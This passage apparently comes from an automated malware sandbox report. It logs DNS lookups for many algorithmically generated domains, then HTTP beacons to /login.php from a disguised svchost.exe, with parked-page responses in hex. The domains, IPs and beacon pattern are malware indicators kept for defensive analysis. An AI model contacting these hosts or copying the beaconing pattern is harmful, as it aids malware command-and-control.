                                                                                                                                                                                                          Nov 11, 2024 18:25:58.314990044 CET1.1.1.1192.168.2.80xd3ffName error (3)qegyfyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.328619003 CET1.1.1.1192.168.2.80x6064Name error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336460114 CET1.1.1.1192.168.2.80xb04dNo error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336460114 CET1.1.1.1192.168.2.80xb04dNo error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.336508989 CET1.1.1.1192.168.2.80xd545Name error (3)ganyrys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.343678951 CET1.1.1.1192.168.2.80x5a59Name error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.344980001 CET1.1.1.1192.168.2.80x957bName error (3)galyhiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.347970009 CET1.1.1.1192.168.2.80xc56No error (0)lygynud.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.353348017 CET1.1.1.1192.168.2.80xfcfdName error (3)gatycoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.362140894 CET1.1.1.1192.168.2.80xa9c4Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.377762079 CET1.1.1.1192.168.2.80x7da4Name error (3)puryxuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381623983 CET1.1.1.1192.168.2.80x8b09Name error (3)pujygul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.381629944 CET1.1.1.1192.168.2.80x4caaName error (3)puvylyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382554054 CET1.1.1.1192.168.2.80x3e9bName error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.382719994 CET1.1.1.1192.168.2.80xaca0Name error (3)qebyrev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.383255959 CET1.1.1.1192.168.2.80x7587Name error (3)vojygut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384507895 CET1.1.1.1192.168.2.80xffefName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.384799957 CET1.1.1.1192.168.2.80xff4bName error (3)lyryxij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392082930 CET1.1.1.1192.168.2.80x4421Name error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.392090082 CET1.1.1.1192.168.2.80x2856Name error (3)vopycom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.396426916 CET1.1.1.1192.168.2.80x22cbName error (3)lyvywed.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403115988 CET1.1.1.1192.168.2.80x61ddName error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.403858900 CET1.1.1.1192.168.2.80x903cName error (3)lykygur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.404027939 CET1.1.1.1192.168.2.80x1c7dName error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.414680004 CET1.1.1.1192.168.2.80xe08aName error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.415659904 CET1.1.1.1192.168.2.80x58c9Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416290998 CET1.1.1.1192.168.2.80x8127Name error (3)vofybyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416296959 CET1.1.1.1192.168.2.80x4dc7Name error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.416497946 CET1.1.1.1192.168.2.80x2a89Name error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417188883 CET1.1.1.1192.168.2.80xa5fdName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417330027 CET1.1.1.1192.168.2.80xbabeName error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417335987 CET1.1.1.1192.168.2.80x6b84Name error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417547941 CET1.1.1.1192.168.2.80x6121Name error (3)gadyveb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417632103 CET1.1.1.1192.168.2.80xe735Name error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417664051 CET1.1.1.1192.168.2.80x85c5Name error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417711020 CET1.1.1.1192.168.2.80x62eeName error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.417819023 CET1.1.1.1192.168.2.80x594fName error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.418150902 CET1.1.1.1192.168.2.80xe2a9Name error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419030905 CET1.1.1.1192.168.2.80xc83fName error (3)gahyfyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.419389009 CET1.1.1.1192.168.2.80xc8e3Name error (3)vocyqaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.423623085 CET1.1.1.1192.168.2.80x1cfcName error (3)qekyhil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.424851894 CET1.1.1.1192.168.2.80x4838No error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.424851894 CET1.1.1.1192.168.2.80x4838No error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.428780079 CET1.1.1.1192.168.2.80x3cf2Name error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.436870098 CET1.1.1.1192.168.2.80x395fName error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440511942 CET1.1.1.1192.168.2.80xd671Name error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.440965891 CET1.1.1.1192.168.2.80xcaf2Name error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.441071033 CET1.1.1.1192.168.2.80x82ccName error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.541747093 CET1.1.1.1192.168.2.80xfe55No error (0)pupycag.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.920490026 CET1.1.1.1192.168.2.80x6425No error (0)lyrysor.comzz1985.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.920490026 CET1.1.1.1192.168.2.80x6425No error (0)zz1985.qu200.comgtm-sg-6l13ukk0m05.qu200.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:25:58.920490026 CET1.1.1.1192.168.2.80x6425No error (0)gtm-sg-6l13ukk0m05.qu200.com103.150.10.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.670610905 CET1.1.1.1192.168.2.80x8676Name error (3)pujybyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.673450947 CET1.1.1.1192.168.2.80x2a5Name error (3)gatyzys.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.695557117 CET1.1.1.1192.168.2.80x3110Name error (3)lyvymir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.705976009 CET1.1.1.1192.168.2.80x38acName error (3)galyfyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.707140923 CET1.1.1.1192.168.2.80x60e1Name error (3)qekynuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.708013058 CET1.1.1.1192.168.2.80xb46aName error (3)lysysod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.708913088 CET1.1.1.1192.168.2.80xc127Name error (3)vonyket.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.710944891 CET1.1.1.1192.168.2.80x5174No error (0)galynuh.com64.225.91.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721386909 CET1.1.1.1192.168.2.80xe884Name error (3)pujydag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721702099 CET1.1.1.1192.168.2.80x2605Name error (3)pupypiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.721992016 CET1.1.1.1192.168.2.80x21f9Name error (3)vojydam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.722206116 CET1.1.1.1192.168.2.80xff6cName error (3)lykynyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.723125935 CET1.1.1.1192.168.2.80x9d96Name error (3)qebykap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.723617077 CET1.1.1.1192.168.2.80xa54eName error (3)vowyrym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.724137068 CET1.1.1.1192.168.2.80xb1c8Name error (3)gacyhis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.726026058 CET1.1.1.1192.168.2.80x905cName error (3)lykyfen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729000092 CET1.1.1.1192.168.2.80x197Name error (3)gahyvew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729099035 CET1.1.1.1192.168.2.80x15b4Name error (3)puvyjop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.729193926 CET1.1.1.1192.168.2.80xf9bfName error (3)lyvyjox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730142117 CET1.1.1.1192.168.2.80x3ca9Name error (3)qedyxip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.730495930 CET1.1.1.1192.168.2.80xe143Name error (3)pupyxup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.731199980 CET1.1.1.1192.168.2.80xde8fName error (3)vonyqok.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.733011961 CET1.1.1.1192.168.2.80x271aName error (3)volygyf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.734563112 CET1.1.1.1192.168.2.80x6714Name error (3)ganykaz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.734710932 CET1.1.1.1192.168.2.80x56ceName error (3)gaqyreh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.735207081 CET1.1.1.1192.168.2.80xa496Name error (3)lyxygud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.737582922 CET1.1.1.1192.168.2.80xf1feName error (3)qetylyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740257025 CET1.1.1.1192.168.2.80xa1d2Name error (3)pufycol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740477085 CET1.1.1.1192.168.2.80x1f86Name error (3)pumylel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.740832090 CET1.1.1.1192.168.2.80x26d5Name error (3)puvymul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.741739035 CET1.1.1.1192.168.2.80xead6Name error (3)vopypif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.745394945 CET1.1.1.1192.168.2.80xee06Name error (3)qetytug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.746670008 CET1.1.1.1192.168.2.80xa5f6Name error (3)ganyqow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.746934891 CET1.1.1.1192.168.2.80x2e71Name error (3)purytyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.747025967 CET1.1.1.1192.168.2.80xf274Name error (3)lygyvar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.748275042 CET1.1.1.1192.168.2.80xb69aName error (3)vojybek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.748771906 CET1.1.1.1192.168.2.80xcae4No error (0)qexyhuv.com76.223.67.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.748771906 CET1.1.1.1192.168.2.80xcae4No error (0)qexyhuv.com13.248.213.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.749167919 CET1.1.1.1192.168.2.80xf4afName error (3)lyrytun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.753720999 CET1.1.1.1192.168.2.80x143Name error (3)qekyfeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.754719019 CET1.1.1.1192.168.2.80x182eName error (3)pumywaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.755563021 CET1.1.1.1192.168.2.80xe2f9Name error (3)vocyjic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.756365061 CET1.1.1.1192.168.2.80x197aName error (3)qebyqil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.758704901 CET1.1.1.1192.168.2.80xdb1eName error (3)puzyguv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.759447098 CET1.1.1.1192.168.2.80xd6d1Name error (3)qedysov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.829430103 CET1.1.1.1192.168.2.80xd1cName error (3)pufypiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.839818954 CET1.1.1.1192.168.2.80x1b68Name error (3)gacynuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.841453075 CET1.1.1.1192.168.2.80x2ce5Name error (3)qexynyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.849694967 CET1.1.1.1192.168.2.80x308aName error (3)lygysij.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.877768040 CET1.1.1.1192.168.2.80x2f85Name error (3)vopyzuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.881529093 CET1.1.1.1192.168.2.80x1eb4No error (0)vofycot.com103.224.182.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.927891016 CET1.1.1.1192.168.2.80x3887Name error (3)purylev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.928985119 CET1.1.1.1192.168.2.80x84c3Name error (3)lyryled.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929101944 CET1.1.1.1192.168.2.80xcd13Name error (3)gatypub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929783106 CET1.1.1.1192.168.2.80xba91Name error (3)lymywaj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.929824114 CET1.1.1.1192.168.2.80x1b56Name error (3)gahydoh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.930708885 CET1.1.1.1192.168.2.80xc19dName error (3)vowykaf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.931050062 CET1.1.1.1192.168.2.80x8abfName error (3)gaqykab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.934875011 CET1.1.1.1192.168.2.80x36bcName error (3)qegysoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.936007023 CET1.1.1.1192.168.2.80xf5eeName error (3)lysyxux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.947926044 CET1.1.1.1192.168.2.80x83dName error (3)vocymut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.973043919 CET1.1.1.1192.168.2.80xb92bNo error (0)lyxynyx.com103.224.212.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.034746885 CET1.1.1.1192.168.2.80x2783No error (0)gadyciz.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.110709906 CET1.1.1.1192.168.2.80x5ea5No error (0)qegyval.com154.85.183.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.875463009 CET1.1.1.1192.168.2.80x2bNo error (0)ww16.vofycot.comwww.sedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.875463009 CET1.1.1.1192.168.2.80x2bNo error (0)www.sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.939996004 CET1.1.1.1192.168.2.80x567aNo error (0)ww25.lyxynyx.com77026.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.939996004 CET1.1.1.1192.168.2.80x567aNo error (0)77026.bodis.com199.59.243.227A (IP address)IN (0x0001)false

                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                          • www.google.comuser-agent:
                                                                                                                                                                                                            • puzylyp.com
                                                                                                                                                                                                            • qegyhig.com
                                                                                                                                                                                                            • lysyvan.com
                                                                                                                                                                                                            • vonypom.com
                                                                                                                                                                                                            • galyqaz.com
                                                                                                                                                                                                            • gadyniw.com
                                                                                                                                                                                                            • gahyqah.com
                                                                                                                                                                                                            • vojyqem.com
                                                                                                                                                                                                            • lyvyxor.com
                                                                                                                                                                                                            • lymyxid.com
                                                                                                                                                                                                            • vocyzit.com
                                                                                                                                                                                                            • qetyfuv.com
                                                                                                                                                                                                            • gatyfus.com
                                                                                                                                                                                                            • pupydeq.com
                                                                                                                                                                                                            • pupycag.com
                                                                                                                                                                                                            • lygynud.com
                                                                                                                                                                                                            • lyrysor.com
                                                                                                                                                                                                            • 106.15.232.163:8000
                                                                                                                                                                                                            • qexyhuv.com
                                                                                                                                                                                                            • galynuh.com
                                                                                                                                                                                                            • gadyciz.com
                                                                                                                                                                                                            • vofycot.com
                                                                                                                                                                                                            • lyxynyx.com
                                                                                                                                                                                                            • qegyval.com
                                                                                                                                                                                                            • ww16.vofycot.com
                                                                                                                                                                                                            • ww25.lyxynyx.com
                                                                                                                                                                                                            • qetyhyg.com
                                                                                                                                                                                                            • gatyhub.com
                                                                                                                                                                                                            • lygyvuj.com
                                                                                                                                                                                                            • gahyhiz.com

                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          0192.168.2.84970518.208.156.248801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.847726107 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vonypom.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.285598993 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=faa9bb05a3860b2faaecfff75b475d85|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.849706199.191.50.83801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:04.932044029 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324378967 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                          Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                          Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                          Set-Cookie: vsid=904vr478891445443024397; expires=Sat, 10-Nov-2029 17:24:05 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Data Raw: 61 39 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69
                                                                                                                                                                                                          Data Ascii: a995<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scri
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324407101 CET212INData Raw: 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 21 22 67 64 70 72 41 70 70 6c 69
                                                                                                                                                                                                          Data Ascii: pt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324421883 CET1236INData Raw: 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 69 64 3d 22 32 31 66 64 63 61 32 32 38 31 38 33 33 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 61 72 61 6d 73 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63
                                                                                                                                                                                                          Data Ascii: in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!(
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324434996 CET1236INData Raw: 67 65 73 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75
